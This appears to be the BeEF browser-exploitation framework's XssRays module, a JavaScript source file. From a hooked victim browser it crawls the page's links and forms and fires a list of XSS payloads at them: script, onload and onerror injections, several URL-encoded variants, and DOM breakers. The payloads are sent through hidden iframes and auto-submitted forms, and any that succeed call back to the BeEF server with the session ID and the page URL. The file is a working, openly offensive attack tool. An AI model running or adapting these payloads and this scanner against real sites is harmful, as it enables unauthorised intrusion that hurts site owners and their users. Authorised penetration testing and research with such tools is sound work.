1
/*
2
 * XSS Rays
3
 * Legal bit:
4
 * Do not remove this notice.
5
 * Copyright (c) 2009 by Gareth Heyes
6
 * Programmed for Microsoft
7
 * gareth --at-- businessinfo -dot- co |dot| uk
8
 * Version 0.5.5
9
 *
10
 * This license governs use of the accompanying software. If you use the software, you
11
 * accept this license. If you do not accept the license, do not use the software.
12
 * 1. Definitions
13
 * The terms "reproduce," "reproduction," "derivative works," and "distribution" have the
14
 * same meaning here as under U.S. copyright law.
15
 * A "contribution" is the original software, or any additions or changes to the software.
16
 * A "contributor" is any person that distributes its contribution under this license.
17
 * "Licensed patents" are a contributor's patent claims that read directly on its contribution.
18
 * 2. Grant of Rights
19
 * (A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.
20
 * (B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.
21
 * 3. Conditions and Limitations
22
 * (A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks.
23
 * (B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.
24
 * (C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.
25
 * (D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.
26
 * (E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
27
 */
28

29
/**
30
 * XssRays 0.5.5 ported to BeEF by Michele "antisnatchor" Orru'
31
 * The XSS detection mechanisms has been rewritten from scratch: instead of using the location hash trick (that doesn't work anymore),
32
 * if the vulnerability is triggered the JS code vector will contact back BeEF.
33
 * Other aspects of the original code have been simplified and improved.
34
 * @namespace beef.net.xssrays
35
 */
36
beef.net.xssrays = {
37
    handler: "xssrays",
38
    completed:0,
39
    totalConnections:0,
40

41
    // BeEF variables
42
    xssraysScanId : 0,
43
    hookedBrowserSession: "",
44
    beefRayUrl: "",
45
    // the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab. 
46
    crossDomain: false,
47
    cleanUpTimeout:5000,
48

49
    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
50
    vectors: [
51

52
				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
53
				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
54
				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
55
				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
56
				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
57
				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
58
				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
59
				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
60
				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
61
				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
62
				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
63
				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
64
				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
65
				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
66
				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
67
				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
68
  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
69
  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
70
				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
71
    ],
72
    uniqueID: 0,
73
    rays: [],
74
    stack: [],
75

76
    /**
77
     * return true is the attack vector can be launched to the current browser type.
78
     * @param {array} vector_array_index 
79
     */
80
    checkBrowser:function(vector_array_index){
81
        var result = false;
82
        var browser_id = this.vectors[vector_array_index].browser;
83
        switch (browser_id){
84
        case "ALL":
85
            result = true;
86
            break;
87
        case "FF":
88
            if(beef.browser.isFF())result=true;
89
            break;
90
        case "IE":
91
            if(beef.browser.isIE())result=true;
92
            break;
93
        case "C":
94
            if(beef.browser.isC())result=true;
95
            break;
96
        case "S":
97
            if(beef.browser.isS())result=true;
98
            break;
99
        case "O":
100
            if(beef.browser.isO())result=true;
101
            break;
102
        default : result = false;
103
        }
104
        beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
105
        return result;
106
    },
107

108
    /**
109
     * main function, where all starts :-)
110
     * @param xssraysScanId 
111
     * @param hookedBrowserSession 
112
     * @param beefUrl 
113
     * @param crossDomain 
114
     * @param timeout 
115
     */
116
    startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {
117

118
        this.xssraysScanId = xssraysScanId;
119
        this.hookedBrowserSession = hookedBrowserSession;
120
        this.beefRayUrl = beefUrl + '/' + this.handler;
121
        beef.debug("Using [" + this.beefRayUrl  + "] handler to contact back BeEF");
122
        this.crossDomain = crossDomain;
123
        this.cleanUpTimeout = timeout;
124

125
        this.scan();
126
        beef.debug("Starting scan");
127
        this.runJobs();
128
    },
129
    complete:function() {
130
        if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
131
            beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
132
            $j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
133
        } else {
134
            this.getNextJob();
135
        }
136
    },
137
    getNextJob:function() {
138
        var that = this;
139
        beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
140
        if (this.stack.length > 0) {
141
            var func = that.stack.shift();
142
            if (func) {
143
                that.completed++;
144
                func.call(that);
145
            }
146
        }else{ //nothing else to scan
147
            this.complete();
148
        }
149
    },
150
    scan:function() {
151
        this.scanLinks();
152
        this.scanForms();
153
    },
154
    scanPaths:function() {
155
        this.xss({type:'path'});
156
        return this;
157
    },
158
    scanForms: function() {
159
        this.xss({type:'form'});
160
        return this;
161
    },
162
    scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
163
        beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
164
        for (var i = 0; i < document.links.length; i++) {
165
            var url = document.links[i];
166

167
            if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) && (location.protocol === 'http:' || location.protocol === 'https:')) {
168
                beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
169
                    "\n url.pathname => " + url.pathname + "\n" +
170
                    "url.search => " + url.search + "\n");
171
                this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
172
                    search:url.search, type: 'url'});//scan each link & param
173
            } else {
174
                beef.debug('Scan is not Cross-origin.  URLS\nurl :' + url.hostname.toString());
175
                beef.debug('\nlocation :' + location.hostname.toString());
176
            }
177
        }
178
        if (location.search.length > 0) {
179
            this.xss({pathname:location.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,search:location.search, type: 'url'});//scan originating url
180
        }
181
        return this;
182
    },
183
    xss:function(target) {
184
        switch (target.type) {
185
            case "url":
186
                if (target.search.length > 0) {
187
                    target.search = target.search.slice(1);
188
                    target.search = target.search.split(/&|&amp;/);
189

190
                    if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
191
                       var pathname = "/" + target.pathname;
192
                    }else{
193
                        var pathname = target.pathname;
194
                    }
195

196
                    var params = {};
197
                    for (var i = 0; i < target.search.length; i++) {
198
                        target.search[i] = target.search[i].split('=');
199
                        params[target.search[i][0]] = target.search[i][1];
200
                    }
201
                    for (var i = 0; i < this.vectors.length; i++) {
202
                        // skip the current vector if it's not compatible with the hooked browser
203
                        if (!this.checkBrowser(i)){
204
                            beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
205
                            continue;
206
                        }
207
                        if (!this.vectors[i].url) {
208
                            continue;
209
                        }
210
                        if (this.vectors[i].url) {
211
                            if (target.port == null || target.port == "") {
212
                                beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
213
                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
214
                            } else {
215
                                beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
216
                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
217
                            }
218
                        }
219
                        if (this.vectors[i].path) {
220
                            if (target.port == null || target.port == "") {
221
                                beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
222
                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
223
                            } else {
224
                                beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
225
                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
226
                            }
227
                        }
228
                    }
229
                }
230
                break;
231
            case "form":
232
                var params = {};
233
                var paramsstring = "";
234
                for (var i = 0; i < document.forms.length; i++) {
235
                    var action = document.forms[i].action || document.location;
236
                    var method = document.forms[i].method.toUpperCase() === 'POST' ?
237
                        'POST' :
238
                        'GET';
239

240
                    for (var j = 0; j < document.forms[i].elements.length; j++) {
241
                        params[document.forms[i].elements[j].name] = document.forms[i].elements[j].value || 1;
242
                    }
243
                    for (var k = 0; k < this.vectors.length; k++) {
244

245
                        // skip the current vector if it's not compatible with the hooked browser
246
                        if (!this.checkBrowser(k)){
247
                            beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
248
                            continue;
249
                        }
250
                        if (!this.vectors[k].form) {
251
                            continue;
252
                        }
253
                        if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
254
                            beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
255
                            beef.debug('location :' + this.host(location));
256
                            continue;
257
                        }
258
                        if (this.vectors[k].form) {
259
                            if (method === 'GET') {
260
                                beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
261
                                this.run(action, method, this.vectors[k], params, true);//params
262
                            }
263
                            else {
264
                                beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
265
                                this.run(action, method, this.vectors[k], params, false);//params
266
                            }
267
                        }
268
                        if (this.vectors[k].path) {
269
                            beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
270
                            this.run(action, 'GET', this.vectors[k], null, true);//paths
271
                        }
272
                    }
273
                }
274
                break;
275
        }
276
    },
277
    host: function(url) {
278
        var host = url;
279
        host = /^https?:[\/]{2}[^\/]+/.test(url.toString())
280
            ? url.toString().match(/^https?:[\/]{2}[^\/]+/)
281
            : /(?:^[^a-zA-Z0-9\/]|^[a-zA-Z0-9]+[:]+)/.test(url.toString())
282
            ? ''
283
            : location.hostname.toString();
284
        return host;
285
    },
286
    fileName: function(url) {
287
        return url.match(/(?:^[^\/]|^https?:[\/]{2}|^[\/]+)[^?]+/) || '';
288
    },
289

290
    urlEncode: function(str) {
291
        str = str.toString();
292
        str = str.replace(/"/g, '%22');
293
        str = str.replace(/&/g, '%26');
294
        str = str.replace(/\+/g, '%2b');
295
        return str;
296
    },
297

298
    /**
299
     * this is the main core function with the detection mechanisms...
300
     * @param url 
301
     * @param method 
302
     * @param vector 
303
     * @param params 
304
     * @param urlencode 
305
     */
306
    run: function(url, method, vector, params, urlencode) {
307
        this.stack.push(function() {
308

309
            //check if the URL end with / . In this case remove the last /, as it will be added later.
310
            // this check is needed only when checking for URI path injections
311
            if(url[url.length - 1] == "/" && params == null){
312
               url = url.substring(0, url.length - 2);
313
               beef.debug("Remove last / from url. New url [" + url + "]");
314
            }
315

316
            beef.net.xssrays.uniqueID++;
317
            beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
318
            var poc = '';
319
            var pocurl = url;
320
            var exploit = '';
321
            var action = url;
322

323

324
            beef.net.xssrays.rays[beef.net.xssrays.uniqueID] = {vector:vector,url:url,params:params};
325
            var ray = this.rays[beef.net.xssrays.uniqueID];
326

327
            var paramsPos = 0;
328
            if (params != null) {
329
                /*
330
                 * ++++++++++ check for XSS in URI parameters (GET) ++++++++++
331
                 */
332
                for (var i in params) {
333
                    if (params.hasOwnProperty(i)) {
334

335
                        if (!/[?]/.test(url)) {
336
                            url += '?';
337
                            pocurl += '?';
338
                        }
339

340
                        poc = vector.input.replace(/XSS/g, "alert(1)");
341
                        pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc) + '&';
342

343
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
344
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
345

346
                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
347
                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
348

349
                        exploit = vector.input.replace(/XSS/g, beefCallback);
350

351
                        if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
352
                            url += i + '=' + exploit + '&';
353
                        }else{
354
                            url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
355
                        }
356

357
                        paramsPos++;
358
                    }
359
                }
360
            } else {
361
                /*
362
                 * ++++++++++ check for XSS in URI path (GET) ++++++++++
363
                 */
364
                var filename = beef.net.xssrays.fileName(url);
365

366
                poc = vector.input.replace(/XSS/g, "alert(1)");
367
                pocurl = poc.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
368

369

370
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
371
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
372

373
                beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
374
                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
375

376
                exploit = vector.input.replace(/XSS/g, beefCallback);
377

378
                //TODO: if the url is something like example.com/?param=1 then a second slash will be added, like example.com//<xss>.
379
                //TODO: this need to checked and the slash shouldn't be added in this particular case
380
                url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
381
            }
382
            /*
383
             * ++++++++++ create the iFrame that will contain the attack vector ++++++++++
384
             */
385
            if(beef.browser.isIE()){
386
                try {
387
                    var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
388
                } catch (e) {
389
                    var iframe = document.createElement('iframe');
390
                    iframe.name = 'ray' + Math.random().toString();
391
                }
392
            }else{
393
                var iframe = document.createElement('iframe');
394
                iframe.name = 'ray' + Math.random().toString();
395
            }
396
            iframe.style.display = 'none';
397
            iframe.id = 'ray' + beef.net.xssrays.uniqueID;
398
            iframe.time = beef.net.xssrays.timestamp();
399

400
            if (method === 'GET') {
401
                if(beef.browser.isC() || beef.browser.isS()){
402
                    var datauri = btoa(url);
403
                    iframe.src = "data:text/html;base64," + datauri;
404
                }else{
405
                    iframe.src = url;
406
                }
407
                document.body.appendChild(iframe);
408
                beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
409
            } else if (method === 'POST') {
410
                /*
411
                 * ++++++++++ check for XSS in body parameters (POST) ++++++++++
412
                 */
413
                var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
414
                poc = '';
415
                pocurl = action + "?";
416
                paramsPos = 0;
417

418
                beef.debug("Form action [" + action + "]");
419
                for (var i in params) {
420
                    if (params.hasOwnProperty(i)) {
421

422
                        poc = vector.input.replace(/XSS/g, "alert(1)");
423
                        poc = poc.replace(/<\/script>/g, "<\/scr\"+\"ipt>");
424
                        pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc); // + '&';
425

426
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
427
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
428

429
                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
430
                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
431

432
                        exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
433
                        form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
434
                        beef.debug("form param[" + i + "] = " + params[i].toString());
435

436
                        paramsPos++;
437
                    }
438
                }
439
                form += '<\/form>';
440
                document.body.appendChild(iframe);
441
                beef.debug("Creating form [" + form + "]");
442
                iframe.contentWindow.document.writeln(form);
443
                iframe.contentWindow.document.writeln('<script>document.createElement("form").submit.apply(document.forms[0]);<\/script>');
444
                beef.debug("Submitting form");
445
            }
446

447
        });
448
    },
449

450
    /**
451
     * run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value
452
     */
453
    runJobs: function() {
454
        var that = this;
455
        this.totalConnections = this.stack.length;
456
        that.getNextJob();
457
        setInterval(function() {
458
            var numOfConnections = 0;
459
            for (var i = 0; i < document.getElementsByTagName('iframe').length; i++) {
460
                var iframe = document.getElementsByTagName('iframe')[i];
461
                numOfConnections++;
462
                //beef.debug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
463
                if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
464
                    try{
465
                        if (iframe) {
466
                            beef.net.xssrays.complete();
467
                            beef.debug("RunJobs cleaning up iFrame [" + iframe.id + "]");
468
                            document.body.removeChild(iframe);
469
                        }
470
                    }catch(e){
471
			beef.debug("Exception [" + e.toString() + "] when cleaning iframes.")
472
		    }
473
                }
474
            }
475

476
            if (numOfConnections == 0) {
477
                clearTimeout(this);
478
            }
479

480
        }, this.cleanUpTimeout);
481

482
        return this;
483
    },
484
    timestamp: function() {
485
        return parseInt(new Date().getTime().toString().substring(0, 10));
486
    },
487
    escape: function(str) {
488
        str = str.toString();
489
        str = str.replace(/</g, '&lt;');
490
        str = str.replace(/>/g, '&gt;');
491
        str = str.replace(/\u0022/g, '&quot;');
492
        str = str.replace(/\u0027/g, '&#39;');
493
        str = str.replace(/\\/g, '&#92;');
494
        return str;
495
    }
496

497
};
498

499
beef.regCmp('beef.net.xssrays');
500

501